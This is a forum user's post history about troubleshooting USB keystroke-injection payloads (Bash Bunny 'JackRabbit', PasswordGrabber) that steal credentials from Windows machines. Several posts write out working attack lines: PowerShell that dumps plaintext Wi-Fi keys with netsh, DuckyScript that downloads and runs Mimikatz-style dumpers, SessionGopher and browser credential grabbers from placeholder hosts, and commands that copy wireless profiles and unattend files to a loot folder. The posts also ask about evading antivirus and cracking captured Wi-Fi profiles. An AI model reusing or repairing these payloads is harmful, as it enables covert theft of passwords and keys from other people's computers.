Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by TeCHemically

  1. I feel your pain man. Many of the cred payloads simply don't work. PasswordGrabber does work; but it doesn't grab wifi creds. I am working on adding that functionality; but with great pains in so doing.
  2. Any of the escaped out powershell commands that are broken up into separate lines with a | at the end will cause an error. I am not sure why; but the do. For the wifi cred jacking section, for instance, the last line with a | at the end causes a stop. If you add that line to the line above, then then preceding line's | is where the break happens. To resolve this anomaly I moved all the | characters to the beginning of each line. This allows the script to run through; however, the creds are not being saved to the loot folder. I am not sure why as of yet.
  3. Could you show me what method would be used to pull a payload down from a hosted server so I can modify it for my own use? I really like this payload and would like to have both methods available.
  4. Oh, I see. Well, doesn't that just reintroduce the same stability issues with hosting payloads? You are still dependent on a network connection for your payload to function. I would rather keep the data written locally and have the option to call on a payload than to have to exfil the data. There's always a chance the exe wont be caught by AV; but if it is hosted and pulled down into memory and executed, then it almost definitely wont get caught by AV. Data exfil brings in its own potential hang ups. I already have a credential payload I'm using for Win that sends creds over the network to a server; but the php script doesn't work right so I just capture them via tcpdump.
  5. I agree that is best; but would still like the option. Is there a write up on implementing a read only partition to the bb for this yet? I am working on adding plaintext wifi cred dumping to your payload. I am having powershell syntax issues; but should have it working once that is worked out. I'll share once it is done.
  6. Looking at the WiFi cred grabber specifically this line is throwing an error at character 383: \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\ ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt Character 383 is the ";" right before "PASSWORD" on the last line toward the end. Here is the error: Unexpected token '\=\$name\' in expression or statement. At line:1 char:383 + \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Valu e.Trim\(\)\}\; \$_\} \| \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Conten t\\W+\\:(.+)\$\"" \| \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\] @\{ "PROFILE_NAME"\=\$name\ <<<< ;PASSWORD\=\$pass \}\} \| Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt + CategoryInfo : ParserError: (\=\$name\:String) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : UnexpectedToken Can someone explain what is going wrong here? Thanks for any help you can provide!
  7. I modified the xcopy section as follows to grab information on the wireless networks on the client: REM if Exist %USERPROFILE%\Documents ( if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( REM /C Continues copying even if errors occur. REM /Q Does not display file names while copying. REM /G Allows the copying of encrypted files to destination that does not support encryption. REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. REM /E Copies directories and subdirectories, including empty ones. xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul REM Same as above but does not create empty directories REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul ) I have confirmed this works and much thanks to RazerBlade for a BB cred payload that actually works! Not only that; but it is insanely fast too! I think we could host the lazagne.exe file on a website we control to get around the read only issue they were discussing on hak5. However, I like the option of being able to do it all locally if possible. What would it take to modify this so we can pull it down from a server and run it? RazerBlade, is that something you could change real fast and make available so we can have an all local copy like we have now and a hosted version like JackRabbit? Thanks again! Also, now that I have these wireless profiles, what is the best use of them? The passphrases are hashed or something. Can these be cracked or used in another way?
  8. Does Password Grabber get windows passwords and wireless profile passwords? I ran it; and it is running; but i'm not getting any passwords in the output file it creates. Thanks for your reply.
  9. I am having similar issues. It has been very frustrating. I identified what is broken in the jackrabbit payload; but don't understand why it is failing. All the details are here: I hope this helps someone; and if I figure this out, I will post my solution in that jackrabbit payload post.
  10. I am having similar issues with credential payloads. Details are here: I have identified what is broken; but don't know how to get it fixed.
  11. This entire section is missing from the 2nd failed window, which explains the mimikatz/dogz failure: # Jackin' Windows creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.rul/md.ps1\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt Q DELAY 1000 Q ENTER These lines are also missing in the powershell window output; which explains why there are no wifi creds, ssh keys, etc, in the loot folder: Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt Q ENTER Q DELAY 1000 # Jackin' SSH Creds # change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information. Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/SessionGopher.ps1\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt Q ENTER Q DELAY 1000 I have no clue why these lines aren't being entered into the window. They appear to be written properly just like the lines above and below them. Thanks to any who respond!
  12. So, going through the script the following part is not entered into the first powershell window: Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt Q ENTER Q DELAY 1000 # Jackin' Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http://site.url/BrowserGather.ps1\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt Q ENTER Q DELAY 1000 Q STRING exit Q ENTER This is why the first window stays open and no browser creds are written to the loot folder. I have no idea why this section is failing like this though. There doesn't seem to be any reason that this section is not injected like the rest.
  13. Here is the output of the first action/terminal window: PS C:\Users\profile> $Bunny = (gwmi win32_volume -f 'label=''BashBunny''' | S elect-Object -ExpandProperty DriveLetter) PS C:\Users\profile> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computerna me)-$($env:username)" PS C:\Users\profile> md $LOOTDIR2 Directory: E:\loot\JackRabbit Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 11/1/2017 10:09 PM TESTMACHINE-PC-profile PS C:\Users\profile> $ClassHolder = [Windows.Security.Credentials.PasswordVau lt,Windows.Security.Credentials,ContentType=WindowsRuntime];$VaultObj = new-obje ct Windows.Security.Credentials.PasswordVault; $VaultObj.RetrieveAll() |foreach { $_.RetrievePassword(); $_ } | >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/chrome.ps1 \)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt I am now hosting the ps1 scripts myself, so the URLs are different than the original payload; however, this was failing from the beginning in the exact same manner. I only began hosting them myself once I started working on the script due to its failures. Here is the output from the 2nd step/powershell terminal: PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $Bunny = (gwmi win32_volume -f 'l abel=''BashBunny''' | Select-Object -ExpandProperty DriveLetter) PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> $LOOTDIR2 = "$($Bunny)\loot\JackR abbit\$($env:computername)-$($env:username)" PS C:\Windows\SysWOW64\WindowsPowerShell\v1.0> IEX (New-Object Net.WebClient).Do wnloadString('http://site.url/fox.ps1\)\; Get-FoxDump \| Out-File \$LOOTDIR2 \\FireFox.txt >> $LOOTDIR2 = "$($Bunny)\loot\JackRabbit\$($env:computername)-$($env:username)" >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/mimidogz.p s1\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt(ne tsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches | % {$_.G roups[1].Value.Trim()}; $_} |%{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" |%{$pass=$_.Matches | % {$_.Groups[1].V alue.Trim()}; $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | >> IEX (New-Object Net.WebClient).DownloadString('http://site.url/ssh.ps1\)\ ; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt$F = @();$ F += "C:\sysprep.inf";$F += "C:\sysprep\sysprep.xml";$F += "C:\WINDOWS\panther\U nattend\Unattended.xml";$F += "C:\WINDOWS\panther\Unattended.xml";$i = 0; foreac h($file in $F) {if (Test-Path $file){cp $file $LOOTDIR2;$i++}} >> Out-File -FilePath $BUNNY\loot\DONE >> $Eject = New-Object -comObject Shell.Application >> $Eject.NameSpace(17).ParseName($Bunny).InvokeVerb("Eject") >> EXIT >> I noticed the double ">>" that are in the terminal now. Is this a result of what is causing these actions to fail? Is there something not escaped out or that is escaped out when it shouldn't be? Also, what is the easiest way to host these ps1 scripts on the bunny in the switch folder and call them locally instead of needing to reach out to the internet?
  14. Has anyone had any success with the jackrabbit payload? It seems to be exactly what I'm looking for; except it's not working at all. It creates the sub-folder for the target in the loot directory; but it doesn't put any data in the folder. Also, it leaves many of its powershell windows open with all of the bashbunny code just sitting there out in the open. It doesn't eject properly either. So, it's not closing its windows, writing any of the target info to the loot folder, or ejecting properly.
  15. Does anyone know what the differences are between this payload and JackRabbit? Not from a functional perspective; but what information is gathered by each payload or are there any differences in what is grabbed?
  16. So, the ducknunter on nethunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string then you need to use the TEXT element instead. I can see how this could make your scripts more efficient; but unless you know about this it just drives you crazy. Hope this helps someone!
  17. I am unable to use scripts that open CMD as admin because phantom ENTER lines are bring executed after my "STRING cmd" lines in my ducky scripts. This is also happening other places. I have a workaround to get an admin prompt; but it is of no use because these ENTER keystrokes are bring entered in places where they should not be; and since they aren't actually in the script I cannot remove them. It may be that the end of line EOL character (LF in this case) is being interpreted as an ENTER keystroke. Is there anyway to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!
  18. That is perfect! Thanks :) Do you know what the per MB charge rate is?
  19. Thanks! Do you have a link to this plan where we can see what the per usage data rates are and where it can be purchased?
  20. I couldn't have said it better myself :)
  21. Thanks, that's good info to have. So, it is looking like this technique is starting to become ineffective in many places already.
  22. This was being caused because there was no SMB traffic on the target. Once I created some the quick creds module/payload worked successfully.
  23. Thanks Seb! Any idea why quick creds is blinking amber on every PC i try it on? That isn't a documented response in the read me.
  • Create New...